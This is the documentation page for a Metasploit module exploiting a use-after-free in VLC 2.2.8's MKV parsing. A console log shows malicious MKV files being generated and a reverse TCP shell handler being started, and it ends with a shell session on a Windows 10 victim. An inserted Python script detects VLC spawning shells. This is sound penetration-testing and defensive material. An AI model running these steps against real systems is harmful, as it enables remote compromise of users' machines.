Vlc Mkv

documentation/modules/exploit/windows/fileformat/vlc_mkv.md

Description

VideoLAN VLC <= v2.2.8 (32- and 64-bit) contains a use-after-free vulnerability in the parsing of MKV files.

This module has been tested against the 32- and 64-bit versions of VLC v2.2.8 on Windows 10 Pro x64.

Vulnerable Application

VLC <= v2.2.8

Verification Steps

  • ./msfconsole -q
  • use exploit/windows/fileformat/vlc_mkv
  • run
  • Start handler
  • Copy over mkv files to target hosts and open part1 in VLC
  • Set a shell
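
A detection-side companion to the steps above, added here as an example and not part of the Metasploit module or its documentation: it flags a VLC process that spawns a command shell or connects to a port outside an assumed allow-list, the pattern the Scenarios session shows. The Sysmon-style records are constructed (only the 172.22.222.134:4444 destination mirrors the scenario), and `EXPECTED_PORTS`, `detect` and `severity` are names and values assumed for illustration.

```python
import ntpath
from collections import defaultdict

PLAYER = "vlc.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumption: ports a media player is expected to reach (HTTP/S, RTSP, RTMP); tune per site.
EXPECTED_PORTS = {80, 443, 554, 1935}

# Constructed Sysmon-style records (EventID 1 = process create, 3 = network connect).
VLC = r"C:\Program Files\VideoLAN\VLC\vlc.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "HOST-A", "ProcessId": 4112, "Image": VLC,
     "ParentProcessId": 900, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "Computer": "HOST-A", "ProcessId": 4112, "Image": VLC,
     "DestinationIp": "172.22.222.134", "DestinationPort": 4444},
    {"EventID": 1, "Computer": "HOST-A", "ProcessId": 5220,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentProcessId": 4112, "ParentImage": VLC},
    # Benign rows: VLC streaming over HTTPS, and a shell started from Explorer.
    {"EventID": 3, "Computer": "HOST-B", "ProcessId": 7001, "Image": VLC,
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "Computer": "HOST-B", "ProcessId": 7300,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentProcessId": 880, "ParentImage": r"C:\Windows\explorer.exe"},
]

def name(path):
    """Lower-cased file name of a Windows path, regardless of the analyst's OS."""
    return ntpath.basename(path or "").lower()

def detect(events):
    """Return {(computer, vlc_pid): sorted reasons} for suspicious VLC instances."""
    hits = defaultdict(set)
    for ev in events:
        if (ev["EventID"] == 1 and name(ev.get("ParentImage")) == PLAYER
                and name(ev.get("Image")) in SHELLS):
            hits[(ev["Computer"], ev["ParentProcessId"])].add("shell_child")
        elif (ev["EventID"] == 3 and name(ev.get("Image")) == PLAYER
                and ev["DestinationPort"] not in EXPECTED_PORTS):
            hits[(ev["Computer"], ev["ProcessId"])].add("unexpected_port")
    return {key: sorted(reasons) for key, reasons in hits.items()}

def severity(reasons):
    """Both signals on one VLC process match the scenario: treat as critical."""
    return "critical" if len(reasons) == 2 else "high" if "shell_child" in reasons else "medium"

if __name__ == "__main__":
    for (computer, pid), reasons in detect(SAMPLE_EVENTS).items():
        print(computer, pid, severity(reasons), reasons)
```

Keying the findings on the VLC process ID lets the two signals correlate to one player instance, so the benign HTTPS stream and the Explorer-launched shell on HOST-B produce no finding.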

Scenarios

Windows 10 x64 running VLC 2.2.8 (x64)

msf > use exploit/windows/fileformat/vlc_mkv
msf exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 
lhost => 172.22.222.134
msf exploit(windows/fileformat/vlc_mkv) > run

[+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv
[*] Created tjub-part1.mkv. Target should open this file
[+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv
[*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv
[*] Appending blocks to tjub-part1.mkv
[+] Successfully appended blocks to tjub-part1.mkv
msf exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444
[*] Payload handler running as background job 0.
msf exploit(windows/fileformat/vlc_mkv) > 
[*] Started reverse TCP handler on 172.22.222.134:4444 
[*] Sending stage (336 bytes) to 172.22.222.200
[*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500
sessions -i 2
[*] Starting interaction with 2...

systeminfo
systeminfo

Host Name:                 DESKTOP-IPOGIJR
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17134 N/A Build 17134